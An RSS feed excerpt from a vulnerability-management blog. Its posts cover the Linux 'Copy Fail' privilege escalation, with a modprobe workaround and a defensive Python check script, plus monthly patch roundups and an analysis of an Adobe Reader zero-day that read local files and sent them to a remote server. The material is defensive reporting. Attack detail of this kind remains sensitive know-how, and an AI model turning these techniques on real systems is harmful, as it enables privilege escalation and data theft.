<b>About Elevation of Privilege - Linux Kernel "Copy Fail" (CVE-2026-31431) vulnerability</b>. A local privilege escalation vulnerability in the Linux kernel AF_ALG component, which <a href="https://copy.fail/">is caused by a memory handling flaw</a>, allows an unprivileged user to escalate privileges to root. By exploiting this vulnerability, an attacker can fully compromise the system: read and modify any files, including passwords and keys, replace system binaries, disable security controls and monitoring tools, stealthily install backdoors and maintain persistence, hide traces of their activity, and use the host as a foothold for attacks on other network assets.</p>
<p>⚙️🛠 On April 1, patches addressing the vulnerability were merged into the main branch of the Linux kernel. On April 22, a CVE identifier was assigned to the vulnerability. On April 29, experts from Theori <a href="https://xint.io/blog/copy-fail-linux-distributions">published</a> an analysis of the vulnerability and a <b>public exploit</b>. The vulnerability's exploitability has been confirmed on up-to-date versions of widely used Linux distributions, including Ubuntu, Amazon Linux, RHEL, and SUSE.</p>
<p>👾 On May 1, the vulnerability <a href="https://www.cisa.gov/news-events/alerts/2026/05/01/cisa-adds-one-known-exploited-vulnerability-catalog">was added to the CISA KEV catalog</a>, indicating it is being exploited in the wild.</p>
<p><b>What distinguishes this vulnerability from similar EOP/LPE issues in Linux?</b></p>
<p>There have been high-profile privilege escalation vulnerabilities in the Linux kernel. Dirty COW required winning a race condition. Multiple attempts were often needed, and this sometimes led to system crashes. Dirty Pipe was tied to specific versions and required precise pipe buffer manipulation.</p>
<p>But unlike Dirty COW and Dirty Pipe, researchers report that Copy Fail is a straight-line logic flaw. It triggers without races, retries, or crash-prone timing windows.</p>
<p><b>🧬 Portability.</b> The same exploit script works across all tested distributions and architectures, including Ubuntu, Amazon Linux, Red Hat Enterprise Linux (RHEL), and SUSE Linux Enterprise. No per-distribution offsets. No recompilation. No version checks in the exploit.</p>
<p><b>✧ Minimalism.</b> The entire exploit is a short Python script using only standard library modules (os, socket, zlib). It requires Python 3.10+ for os.splice. No compiled payloads, no dependency installation.</p>
<p><b>🥷 Stealth.</b> The write bypasses the ordinary VFS write path, so the corrupted page is never marked dirty and the kernel's writeback machinery never flushes it to disk. The on-disk file stays unchanged: a file integrity tool that reads the block device directly, or one that runs after the page has been evicted (for example, after a reboot), sees the original content, while any process reading the file through the page cache gets the modified content. Only the in-memory page cache is corrupted.</p>
<p><b>📦 Cross-container impact.</b> The page cache is shared across all processes on the system, including across container boundaries. Copy Fail is not just a local privilege escalation. It is a container escape primitive and a vector for Kubernetes node compromise.</p>
<p><b>How to fix the vulnerability?</b></p>
<p>To remediate the vulnerability, users need to update to <a href="https://www.cve.org/CVERecord?id=CVE-2026-31431">Linux kernel versions</a> 6.18.22, 6.19.12, or 7.0 (or later releases of those branches). The kernel can be built manually, or users can wait for their Linux distribution vendor to release updated kernel packages; distribution kernels usually backport the fix under their own version numbers, so check the vendor advisory rather than the mainline version alone. As of May 4, <a href="https://threatprotect.qualys.com/2026/05/04/linux-kernel-vulnerability-exploited-in-the-wild-copy-fail-cve-2026-31431">updates have been released</a> for Ubuntu, Debian, RHEL, Fedora, SUSE, CloudLinux, Arch Linux, and <a href="https://bugzilla.rosa.ru/show_bug.cgi?id=20546">ROSA Linux</a>.</p>
<p>As a workaround, researchers suggest <a href="https://xint.io/blog/copy-fail-linux-distributions#:~:text=block%20AF_ALG%20socket%20creation">blocking</a> the creation of AF_ALG sockets by preventing the algif_aead module from being loaded (run as root):</p>
<p>echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf<br />
rmmod algif_aead 2>/dev/null</p>
<p>The "install" line tells modprobe to run /bin/false instead of loading the module, which also defeats the kernel's automatic module load when a process binds an AF_ALG socket of type "aead"; rmmod removes a copy that is already loaded (it fails silently if the module is in use, so confirm with lsmod afterwards). If algif_aead is compiled into the kernel rather than built as a module (it is listed in /lib/modules/$(uname -r)/modules.builtin), this workaround does not apply and patching is the only option.</p>
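<p>To apply the workaround from a configuration tool and, more importantly, to verify that it took effect, the following Python script is an added example written for this post (not the researchers' code): it writes the same "install" rule, classifies algif_aead as loaded, absent, or built in (the built-in case cannot be blocked by modprobe rules), and then attempts the very operation the exploit depends on, a bind() on an AF_ALG socket of type "aead", which is what triggers the kernel's autoload of algif_aead. The /proc/modules and modules.builtin text it ships with are constructed samples for its own tests.</p>

```python
"""Apply and verify the AF_ALG workaround for Copy Fail (added example, not
from the post or the researchers)."""
import os
import socket
import tempfile

MODULE = "algif_aead"


def modprobe_rule(module: str = MODULE) -> str:
    """'install' makes modprobe run /bin/false instead of loading the module,
    so both manual loads and kernel-initiated autoloads are refused."""
    return f"install {module} /bin/false\n"


def write_block_rule(module: str = MODULE, confdir: str = "/etc/modprobe.d") -> str:
    """Write the rule file and return its path. Needs root for the default confdir."""
    path = os.path.join(confdir, f"disable-{module.replace('_', '-')}.conf")
    with open(path, "w") as fh:
        fh.write(modprobe_rule(module))
    return path


def module_state(module: str, proc_modules: str, modules_builtin: str) -> str:
    """Classify a module from the text of /proc/modules and modules.builtin:
    'loaded', 'builtin' (cannot be unloaded or blocked), or 'absent'.
    Module names may use '-' or '_'; the kernel treats them alike."""
    module = module.replace("-", "_")
    for line in proc_modules.splitlines():
        fields = line.split()
        if fields and fields[0].replace("-", "_") == module:
            return "loaded"
    for line in modules_builtin.splitlines():
        name = os.path.basename(line.strip())
        if name.endswith(".ko"):
            name = name[:-3]
        if name.replace("-", "_") == module:
            return "builtin"
    return "absent"


def live_module_state(module: str = MODULE) -> str:
    """module_state() against the running kernel."""
    with open("/proc/modules") as fh:
        proc = fh.read()
    builtin_path = f"/lib/modules/{os.uname().release}/modules.builtin"
    builtin = ""
    if os.path.exists(builtin_path):
        with open(builtin_path) as fh:
            builtin = fh.read()
    return module_state(module, proc, builtin)


def aead_interface_reachable(algorithm: str = "gcm(aes)") -> bool:
    """True if userspace can still bind an AF_ALG aead socket. bind() is the
    call that makes the kernel request algif_aead; with the install rule in
    place and the module unloaded it fails, so False means the workaround is
    effective. It stays True while an already-loaded copy remains in memory,
    which is why the rmmod step matters."""
    if not hasattr(socket, "AF_ALG"):
        return False  # not Linux: the interface does not exist
    try:
        with socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0) as sock:
            sock.bind(("aead", algorithm))
        return True
    except OSError:
        return False


def dry_run_rule(module: str = MODULE) -> str:
    """Write the rule into a temporary directory and return what was written."""
    with tempfile.TemporaryDirectory() as tmp:
        path = write_block_rule(module, tmp)
        with open(path) as fh:
            return fh.read()


# Constructed sample inputs (not captured from a real host) for module_state().
SAMPLE_PROC_MODULES = (
    "algif_aead 16384 0 - Live 0x0000000000000000\n"
    "af_alg 32768 1 algif_aead, Live 0x0000000000000000\n"
)
SAMPLE_MODULES_BUILTIN = "kernel/crypto/crypto_algapi.ko\nkernel/crypto/aead.ko\n"


if __name__ == "__main__":
    print("module state:", live_module_state())
    if os.geteuid() == 0:
        print("wrote", write_block_rule())
    print("AF_ALG aead reachable:", aead_interface_reachable())
```

<p>Run it once before and once after applying the rule and unloading the module: the expected transition is from "loaded" and reachable to "absent" and unreachable. If it reports "builtin", the only remediation is the kernel update.</p>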
]]></content:encoded>
					
					<wfw:commentRss>https://avleonov.com/2026/04/30/i044-about-elevation-of-privilege-linux-kernel-copy-fail-cve202631431-vulnerability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>April &quot;In the Trend of VM&quot; (#26): one Microsoft SharePoint vulnerability</title>
		<link>https://avleonov.com/2026/04/28/i042-april-in-the-trend-of-vm-26-one-microsoft-sharepoint-vulnerability/</link>
					<comments>https://avleonov.com/2026/04/28/i042-april-in-the-trend-of-vm-26-one-microsoft-sharepoint-vulnerability/#respond</comments>
		
		<dc:creator><![CDATA[Alexander Leonov]]></dc:creator>
		<pubDate>Tue, 28 Apr 2026 18:00:00 +0000</pubDate>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[CISA]]></category>
		<category><![CDATA[CISAKEV]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[PositiveTechnologies]]></category>
		<category><![CDATA[SharePoint]]></category>
		<category><![CDATA[TrendVulns]]></category>
		<category><![CDATA[vulnerability]]></category>
		<guid isPermaLink="false">https://avleonov.com/2026/04/28/i042-april-in-the-trend-of-vm-26-a-microsoft-sharepoint-vulnerability/</guid>

					<description><![CDATA[April "In the Trend of VM" (#26): one Microsoft SharePoint vulnerability. Presenting the traditional monthly roundup of trending vulnerabilities according to Positive Technologies. Once again, it is single-vendor, Microsoft-related, and this time it could not be more compact. While the previous March edition had four trending vulnerabilities, this April edition has only one. In the [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><center><a href="https://avleonov.com/wp-content/uploads/2026/05/photo_i042@00.jpg"><img decoding="async" fetchpriority="high" class="aligncenter wp-image-65 " src="https://avleonov.com/wp-content/uploads/2026/05/photo_i042@00.jpg" alt="April In the Trend of VM (#26): one Microsoft SharePoint vulnerability"width="425" height="425"/></a></center></p>
<p>
<b>April "In the Trend of VM" (#26): one Microsoft SharePoint vulnerability.</b> Presenting the traditional monthly roundup of trending vulnerabilities according to Positive Technologies. Once again, it is single-vendor, Microsoft-related, and this time it could not be more compact. While the <a href="https://avleonov.com/2026/03/22/i003-march-in-the-trend-of-vm-25-once-again-vulnerabilities-are-only-in-microsoft-products/">previous March edition had four trending vulnerabilities</a>, this April edition has only one. In the upcoming May edition, we expect at least three trending vulnerabilities. 😉</p>
<p>🗞 <a href="https://habr.com/ru/companies/pt/articles/1028828/">Post on Habr (rus)</a><br />
🗒 <a href="https://ptsecurity.com/research/analytics/trending-vulnerability-digest-april-2026/">Digest on the PT website (rus)</a></p>
<p>This vulnerability is from the <a href="https://avleonov.com/2026/01/13/1620-january-microsoft-patch-tuesday/">January Microsoft Patch Tuesday</a>:</p>
<p>🔻 <b>RCE</b> - Microsoft SharePoint (<a href="https://avleonov.com/2026/04/03/i018-about-remote-code-execution-microsoft-sharepoint-cve202620963-vulnerability/">CVE-2026-20963</a>). The vulnerability was initially considered less critical due to an authentication requirement (PR:L), but after Microsoft’s reassessment it turned out that authentication is not required for exploitation (PR:N). The vulnerability has been added to the CISA KEV, meaning attackers are already exploiting it in the wild. There are no public exploits yet.</p>
<p>🟥 The full list of trending vulnerabilities is available <a href="https://ptsecurity.com/research/trending-vulnerabilities/?utm_source=tg_leonov&utm_medium=article&utm_campaign=trending">on the portal</a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://avleonov.com/2026/04/28/i042-april-in-the-trend-of-vm-26-one-microsoft-sharepoint-vulnerability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>April Linux Patch Wednesday</title>
		<link>https://avleonov.com/2026/04/22/i036-april-linux-patch-wednesday/</link>
					<comments>https://avleonov.com/2026/04/22/i036-april-linux-patch-wednesday/#respond</comments>
		
		<dc:creator><![CDATA[Alexander Leonov]]></dc:creator>
		<pubDate>Wed, 22 Apr 2026 16:00:00 +0000</pubDate>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[Vulristics]]></category>
		<category><![CDATA[ActiveMQ]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[awstats]]></category>
		<category><![CDATA[Axios]]></category>
		<category><![CDATA[Chromium]]></category>
		<category><![CDATA[CISAKEV]]></category>
		<category><![CDATA[Cockpit]]></category>
		<category><![CDATA[CUPS]]></category>
		<category><![CDATA[dynaconf]]></category>
		<category><![CDATA[ecdsa]]></category>
		<category><![CDATA[Glances]]></category>
		<category><![CDATA[glibc]]></category>
		<category><![CDATA[GLPI]]></category>
		<category><![CDATA[GoogleChrome]]></category>
		<category><![CDATA[grpc]]></category>
		<category><![CDATA[Handlebars]]></category>
		<category><![CDATA[hdf5]]></category>
		<category><![CDATA[httplib]]></category>
		<category><![CDATA[icalendar]]></category>
		<category><![CDATA[incus]]></category>
		<category><![CDATA[Keycloak]]></category>
		<category><![CDATA[KVMTool]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[LinuxKernel]]></category>
		<category><![CDATA[LinuxPatchWednesday]]></category>
		<category><![CDATA[Mongoose]]></category>
		<category><![CDATA[Netty]]></category>
		<category><![CDATA[NetwideAssembler]]></category>
		<category><![CDATA[NLTK]]></category>
		<category><![CDATA[Nodejs]]></category>
		<category><![CDATA[openexr]]></category>
		<category><![CDATA[ormar]]></category>
		<category><![CDATA[QEMU]]></category>
		<category><![CDATA[rack]]></category>
		<category><![CDATA[rack_session]]></category>
		<category><![CDATA[Rust]]></category>
		<category><![CDATA[Safari]]></category>
		<category><![CDATA[scitokens]]></category>
		<category><![CDATA[Tar]]></category>
		<category><![CDATA[tiemu]]></category>
		<category><![CDATA[Traefik]]></category>
		<category><![CDATA[VertX]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wolfssl]]></category>
		<guid isPermaLink="false">https://avleonov.com/2026/04/22/i036-april-linux-patch-wednesday/</guid>

					<description><![CDATA[April Linux Patch Wednesday. In April, Linux vendors addressed 1,035 vulnerabilities - nearly twice as many as in March. One might assume that most of these would again be Linux Kernel vulnerabilities, but that's not the case! Linux Kernel vulnerabilities were relatively few - just 209. The remaining vulnerabilities are distributed across more than 200 [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><center><a href="https://avleonov.com/wp-content/uploads/2026/04/photo_i036@00.jpg"><img decoding="async" fetchpriority="high" class="aligncenter wp-image-65 " src="https://avleonov.com/wp-content/uploads/2026/04/photo_i036@00.jpg" alt="April Linux Patch Wednesday"width="425" height="425"/></a></center></p>
<p>
<b>April Linux Patch Wednesday.</b> In April, Linux vendors addressed 1,035 vulnerabilities - nearly twice as many <a href="https://avleonov.com/2026/03/30/i012-march-linux-patch-wednesday/">as in March</a>. One might assume that most of these would again be Linux Kernel vulnerabilities, but that's not the case! Linux Kernel vulnerabilities were relatively few - just 209. The remaining vulnerabilities are distributed across more than 200 affected products. Notably, two vulnerabilities show evidence of active exploitation in the wild:</p>
<p>🔻 <b>RCE</b> - Apache ActiveMQ (CVE-2026-34197). Remote code execution is possible via the Jolokia API (/api/jolokia/) with no authentication required. The vulnerability remained hidden in the codebase for 13 years before being discovered using AI. Listed in the CISA KEV since <a href="https://www.cisa.gov/news-events/alerts/2026/04/16/cisa-adds-one-known-exploited-vulnerability-catalog">April 16</a>. Numerous exploits are available on GitHub.</p>
<p>🔻 <b>RCE</b> - <b>Chromium (CVE-2026-5281)</b>. A use-after-free vulnerability in Dawn (Chromium's graphics layer and WebGPU implementation) affects Google Chrome versions prior to 146.0.7680.178. A remote attacker who has gained control of the rendering process can execute arbitrary code via a specially crafted HTML page. Listed in the CISA KEV since <a href="https://www.cisa.gov/news-events/alerts/2026/04/01/cisa-adds-one-known-exploited-vulnerability-catalog">April 1</a>.</p>
<p>Public exploits are available, or signs of their existence have been observed, for another 133 (❗️) vulnerabilities. The most notable ones, in my opinion:</p>
<p>🔸 <b>RCE</b> - Cockpit (CVE-2026-4631). Cockpit is a web‑based tool for server administration in Linux systems, enabling users to manage servers, containers, storage, and network configurations through a browser interface. An attacker with network access to the Cockpit web service can send a single HTTP request to the login page, injecting malicious SSH options or commands and executing code on the Cockpit server - all without valid credentials.</p>
<p>🔸 <b>RCE</b> - CUPS (CVE-2026-34990 + CVE-2026-34980). CUPS (Common UNIX Printing System) is a printing system for Unix‑like operating systems, including Linux and macOS. A chain of these vulnerabilities allows a remote attacker without authentication to overwrite files with root permissions over the network, effectively gaining root access on a typical Linux system.</p>
<p>🔸 <b>RCE</b> - KVM Tool (CVE-2021-45464). KVM Tool is a lightweight tool for running virtual machines based on KVM (Kernel‑based Virtual Machine) in Linux. KVM Tool prior to commit 39181fc contains an out‑of‑bounds write vulnerability, allowing a guest OS user to execute arbitrary code on the host machine.</p>
<p>🔸 <b>PathTrav</b> - tar (npm) (CVE-2026-31802, CVE-2026-24842). Prior to version 7.5.11, the npm package allowed a crafted archive to create a symbolic link pointing outside the extraction directory, leading to file overwrites.</p>
<p>Other vulnerabilities worth paying attention to:</p>
<p>🔸 <b>RCE</b> - Handlebars (CVE-2026-33937), tiemu (CVE-2017-20225), Netwide Assembler (CVE-2026-6067), openexr (CVE-2026-34545), Axios (CVE-2026-40175), hdf5 (CVE-2026-29043)<br />
🔸 <b>CodeInj</b> - GLPI (CVE-2025-66417), glances (CVE-2026-30930, CVE-2026-32611), Handlebars (CVE-2026-33938, CVE-2026-33940), dynaconf (CVE-2026-33154), icalendar (CVE-2026-33635)<br />
🔸 <b>SFB</b> - ormar (CVE-2026-27953), cpp-httplib (CVE-2026-34441), Safari (CVE-2026-20643), rack (CVE-2026-34835), wolfssl (CVE-2026-5194), Traefik (CVE-2026-32695), glances (CVE-2026-32632, CVE-2026-32634), Vert.x-Web (CVE-2026-1002), ecdsa (CVE-2026-33936), glibc (CVE-2026-4438), incus (CVE-2026-33542), Mongoose (CVE-2026-2968)<br />
🔸 <b>AuthBypass</b> - scitokens_cpp_library (CVE-2026-32725, CVE-2026-32726), Node.js pbkdf2 (CVE-2026-32633), rack-session (CVE-2026-39324), Traefik (CVE-2026-33433), grpc (CVE-2026-33186), nltk (CVE-2026-33231)<br />
🔸 <b>ArbFileWrite</b> - Rust (CVE-2026-33056)<br />
🔸 <b>CmdInj</b> - Netty (CVE-2026-33870), awstats (CVE-2025-63261)<br />
🔸 <b>EoP</b> - Keycloak (CVE-2026-4636), QEMU (CVE-2026-33711), glances (CVE-2026-33641)</p>
<p>🗒 <a href="https://avleonov.com/vulristics_reports/linux_patch_wednesday_april2026_report_with_comments_ext_img.html">Full Vulristics report</a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://avleonov.com/2026/04/22/i036-april-linux-patch-wednesday/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>April Microsoft Patch Tuesday</title>
		<link>https://avleonov.com/2026/04/17/i028-april-microsoft-patch-tuesday/</link>
					<comments>https://avleonov.com/2026/04/17/i028-april-microsoft-patch-tuesday/#respond</comments>
		
		<dc:creator><![CDATA[Alexander Leonov]]></dc:creator>
		<pubDate>Fri, 17 Apr 2026 10:00:00 +0000</pubDate>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[Vulristics]]></category>
		<category><![CDATA[ActiveDirectory]]></category>
		<category><![CDATA[BlueHammer]]></category>
		<category><![CDATA[ChaoticEclipse]]></category>
		<category><![CDATA[IKE]]></category>
		<category><![CDATA[IPSec]]></category>
		<category><![CDATA[IPv6]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[MicrosoftDefender]]></category>
		<category><![CDATA[NCSC]]></category>
		<category><![CDATA[PatchTuesday]]></category>
		<category><![CDATA[Pwn2Own]]></category>
		<category><![CDATA[RemoteDesktop]]></category>
		<category><![CDATA[RPC]]></category>
		<category><![CDATA[SharePoint]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[WindowsPushNotifications]]></category>
		<category><![CDATA[WindowsTCPIP]]></category>
		<category><![CDATA[Winsock]]></category>
		<guid isPermaLink="false">https://avleonov.com/2026/04/17/i028-april-microsoft-patch-tuesday/</guid>

					<description><![CDATA[April Microsoft Patch Tuesday. A total of 167 vulnerabilities, about twice as many as in March. There is one vulnerability already being exploited in the wild: 🔻 Spoofing - Microsoft SharePoint Server (CVE-2026-32201). ZDI experts say "Spoofing bugs in SharePoint often manifest as cross-site scripting (XSS) bugs". "An attacker who successfully exploited the vulnerability could [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><center><a href="https://avleonov.com/wp-content/uploads/2026/04/photo_i028@0.jpg"><img decoding="async" fetchpriority="high" class="aligncenter wp-image-65 " src="https://avleonov.com/wp-content/uploads/2026/04/photo_i028@0.jpg" alt="April Microsoft Patch Tuesday"width="425" height="425"/></a></center></p>
<p>
<b>April Microsoft Patch Tuesday.</b> A total of 167 vulnerabilities, about twice as many as <a href="https://avleonov.com/2026/03/11/1637-march-microsoft-patch-tuesday/">in March</a>. There is one vulnerability already being exploited in the wild:</p>
<p>🔻 <b>Spoofing</b> - Microsoft SharePoint Server (CVE-2026-32201). ZDI experts say "Spoofing bugs in SharePoint often manifest as cross-site scripting (XSS) bugs". "An attacker who successfully exploited the vulnerability could view some sensitive information (Confidentiality), make changes to disclosed information (Integrity), but cannot limit access to the resource (Availability)". There is no info yet about how widely it is being used in attacks, but you should not delay patching, especially if SharePoint is exposed to the Internet.</p>
<p>Formally, there are no public exploits yet. However, there are strong indications that a public exploit may already exist for one vulnerability.</p>
<p>🔸 <b>EoP</b> - Microsoft Defender (CVE-2026-33825). "Insufficient granularity of access control" in Microsoft Defender allows a logged-in attacker to gain higher privileges on a local system. Tenable and ZDI say the bug looks similar to the BlueHammer zero-day, for which a public exploit was released on GitHub on April 3. The researcher who published it, Chaotic Eclipse, criticized Microsoft’s disclosure process. ZDI says the exploit is real, but exploitation is unstable and not always reliable.</p>
<p>Other important issues:</p>
<p>🔹 <b>RCE</b> - Windows Active Directory (CVE-2026-33826). To exploit this, the attacker must have an account. The attacker sends a specially crafted RPC request to a vulnerable server, which can lead to code execution. Microsoft says the attacker must be in the same restricted Active Directory domain as the target system.</p>
<p>🔹 <b>RCE</b> - Windows Internet Key Exchange (IKE) Service Extensions (CVE-2026-33824). ZDI says this vulnerability is wormable, meaning it could allow malware to spread automatically between systems. It affects systems with IKE enabled, which creates a large attack surface. Microsoft recommends blocking UDP ports 500 and 4500 at the network edge. However, attackers inside the network can still use it for lateral movement. Patch quickly if you use IKE.</p>
<p>🔹 <b>RCE</b> - Windows TCP/IP (CVE-2026-33827). ZDI also says this may be wormable, especially on systems using IPv6 and IPSec. A race condition makes it harder to exploit, but similar bugs are often exploited at Pwn2Own, so you should not rely on that difficulty. If you use IPv6, test and deploy the patch quickly before exploits appear.</p>
<p>🔹 <b>EoP</b> - Windows Push Notifications (CVE-2026-26167). This Patch Tuesday includes several sandbox escape vulnerabilities, including in Push Notifications, AFD for Winsock, Windows Management Services, and User Interface Core. CVE-2026-26167 (Push Notifications) is the most important because it is the only one with low attack complexity. The others require winning a race condition (AC:H).</p>
<p>🔹 <b>Spoofing</b> - Remote Desktop (CVE-2026-26151). Weak warnings in the Remote Desktop interface allow a network attacker to trick a user into opening a specially crafted file, leading to spoofing. The issue was found by the UK National Cyber Security Centre (NCSC).</p>
<p>🗒 <a href="https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2026_report_with_comments_ext_img.html">Full Vulristics report</a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://avleonov.com/2026/04/17/i028-april-microsoft-patch-tuesday/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>About Remote Code Execution - Adobe Reader (CVE-2026-34621) vulnerability</title>
		<link>https://avleonov.com/2026/04/14/i026-about-remote-code-execution-adobe-reader-cve202634621-vulnerability/</link>
					<comments>https://avleonov.com/2026/04/14/i026-about-remote-code-execution-adobe-reader-cve202634621-vulnerability/#respond</comments>
		
		<dc:creator><![CDATA[Alexander Leonov]]></dc:creator>
		<pubDate>Tue, 14 Apr 2026 15:00:00 +0000</pubDate>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[AcrobatReader]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[CISAKEV]]></category>
		<category><![CDATA[EXPMON]]></category>
		<category><![CDATA[HaifeiLi]]></category>
		<category><![CDATA[PrototypePollution]]></category>
		<category><![CDATA[RSSaddFeed]]></category>
		<category><![CDATA[utilReadFileIntoStream]]></category>
		<category><![CDATA[VirusTotal]]></category>
		<category><![CDATA[vulnerability]]></category>
		<guid isPermaLink="false">https://avleonov.com/2026/04/14/i026-about-remote-code-execution-adobe-reader-cve202634621-vulnerability/</guid>

					<description><![CDATA[About Remote Code Execution - Adobe Reader (CVE-2026-34621) vulnerability. Adobe Acrobat Reader (from 2003 to 2015, "Adobe Reader") is a free PDF viewer developed by Adobe. Versions are available for Windows, macOS, Android, and iOS. The remote code execution vulnerability in Adobe Acrobat for Windows and macOS is caused by improper handling of object prototype [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><center><a href="https://avleonov.com/wp-content/uploads/2026/05/photo_i026@0.jpg"><img decoding="async" fetchpriority="high" class="aligncenter wp-image-65 " src="https://avleonov.com/wp-content/uploads/2026/05/photo_i026@0.jpg" alt="About Remote Code Execution - Adobe Reader (CVE-2026-34621) vulnerability"width="425" height="425"/></a></center></p>
<p>
<b>About Remote Code Execution - Adobe Reader (CVE-2026-34621) vulnerability.</b> Adobe Acrobat Reader (from 2003 to 2015, "Adobe Reader") is a free PDF viewer developed by Adobe. <a href="https://helpx.adobe.com/reader/system-requirements.html">Versions</a> are available for Windows, macOS, Android, and iOS. The remote code execution vulnerability in Adobe Acrobat for Windows and macOS is caused by improper handling of object prototype attributes (<a href="https://cwe.mitre.org/data/definitions/1321.html">CWE-1321</a> - "Prototype Pollution"). Successful exploitation of the vulnerability allows an attacker to execute arbitrary code on the target system when the victim opens a specially crafted document.</p>
<p>👾 Researcher Haifei Li, the developer of <a href="https://pub.expmon.com/">EXPMON</a> - a sandbox-based system designed to detect file-based zero-days and hard-to-detect exploits - <a href="https://justhaifei1.blogspot.com/2026/04/expmon-detected-sophisticated-zero-day-adobe-reader.html">reported</a> the vulnerability and the existence of a working exploit on <b>April 7</b>. Earlier, on <b>March 26</b>, an unknown individual uploaded a malicious PDF sample named <b>yummy_adobe_exploit_uwu.pdf</b> to the public EXPMON service.</p>
<p><i>According to the analysis results, the sample behaved like an initial exploit capable of collecting and transmitting various types of information to the attacker, potentially followed by arbitrary code execution (RCE) and sandbox escape (SBX) exploits. It used a zero-day vulnerability in Adobe Reader that allowed it to invoke privileged Acrobat APIs. The exploit was confirmed to work on the latest version of Acrobat. Specifically, it abused the "util.readFileIntoStream()" API, which allows arbitrary files accessible to the isolated Reader process to be read from the local system. This enabled the malware to collect a wide range of information from the victim's machine and steal data from local files. The "RSS.addFeed()" API was used to send the collected information to a remote server and retrieve additional JavaScript code for execution. Such a mechanism allows attackers to gather user information, steal local data, perform advanced fingerprinting, and further develop the attack. If the target matched the attacker's criteria, an additional exploit could then be delivered to achieve RCE or SBX. However, during testing, the researcher was unable to obtain the additional exploit payload - although the server was reachable, it did not respond. This may have been caused by several factors. For example, the local testing environments may not have matched the specific criteria expected by the attacker.</i></p>
<p><b>On April 8</b>, another malicious file sample was discovered on VirusTotal. The file had originally been uploaded on <b>November 28, 2025</b>, indicating that this 0day/APT campaign had been active for at least four months.</p>
<p><b>On April 9</b>, researcher Gi7w0rm reported signs of active exploitation of the vulnerability in attacks. The attacks used malicious Russian-language documents disguised as materials related to Russia's oil and gas sector as phishing lures. Based on the observed targeting, the campaign appears to have been aimed at <i><b>specific Russian organizations</b></i>.</p>
<p><b>On April 13</b>, the vulnerability was <a href="https://www.cisa.gov/news-events/alerts/2026/04/13/cisa-adds-seven-known-exploited-vulnerabilities-catalog">added</a> to the CISA KEV catalog.</p>
<p>⚙️ The Adobe security bulletin <a href="https://helpx.adobe.com/security/products/acrobat/apsb26-43.html">was published</a> on <b>April 12</b>. Affected versions include Acrobat DC 26.001.21367 and earlier, Acrobat Reader DC 26.001.21367 and earlier, and Acrobat 2024 24.001.30356 and earlier. The vulnerability has been fixed in Acrobat DC 26.001.21411, Acrobat Reader DC 26.001.21411, and Acrobat 2024 (Windows: 24.001.30362/Mac: 24.001.30360).</p>
<p>Adobe recommends that users of affected versions update their applications via “Help > Check for Updates”, which triggers the automatic update process. Alternatively, users can download the Acrobat Reader installer directly from Adobe's official portal.</p>
<p>The bulletin notes that Adobe is aware of active exploitation of vulnerability CVE-2026-34621 in the wild.</p>
<p>🛠 No public exploits have been observed so far.</p>
<p>💡 PDF files received from untrusted or unexpected sources should always be treated with caution and opened in isolated (sandboxed) environments. 😉</p>
]]></content:encoded>
					
					<wfw:commentRss>https://avleonov.com/2026/04/14/i026-about-remote-code-execution-adobe-reader-cve202634621-vulnerability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>About Remote Code Execution - Microsoft SharePoint (CVE-2026-20963) vulnerability</title>
		<link>https://avleonov.com/2026/04/03/i018-about-remote-code-execution-microsoft-sharepoint-cve202620963-vulnerability/</link>
					<comments>https://avleonov.com/2026/04/03/i018-about-remote-code-execution-microsoft-sharepoint-cve202620963-vulnerability/#respond</comments>
		
		<dc:creator><![CDATA[Alexander Leonov]]></dc:creator>
		<pubDate>Fri, 03 Apr 2026 17:00:00 +0000</pubDate>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[CISA]]></category>
		<category><![CDATA[CISAKEV]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[prioritization]]></category>
		<category><![CDATA[SharePoint]]></category>
		<category><![CDATA[VMprocess]]></category>
		<category><![CDATA[vulnerability]]></category>
		<guid isPermaLink="false">https://avleonov.com/2026/04/03/i018-about-remote-code-execution-microsoft-sharepoint-cve202620963-vulnerability/</guid>

					<description><![CDATA[About Remote Code Execution - Microsoft SharePoint (CVE-2026-20963) vulnerability. This vulnerability was fixed in the January MSPT. At the time of the MSPT release on January 13, VM vendors did not highlight this vulnerability in their reviews, and Microsoft reported no evidence of exploitation in the wild. The CVSS vector was initially rated as CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><center><a href="https://avleonov.com/wp-content/uploads/2026/04/photo_i018@0.jpg"><img decoding="async" fetchpriority="high" class="aligncenter wp-image-65 " src="https://avleonov.com/wp-content/uploads/2026/04/photo_i018@0.jpg" alt="About Remote Code Execution - Microsoft SharePoint (CVE-2026-20963) vulnerability"width="425" height="425"/></a></center></p>
<p>
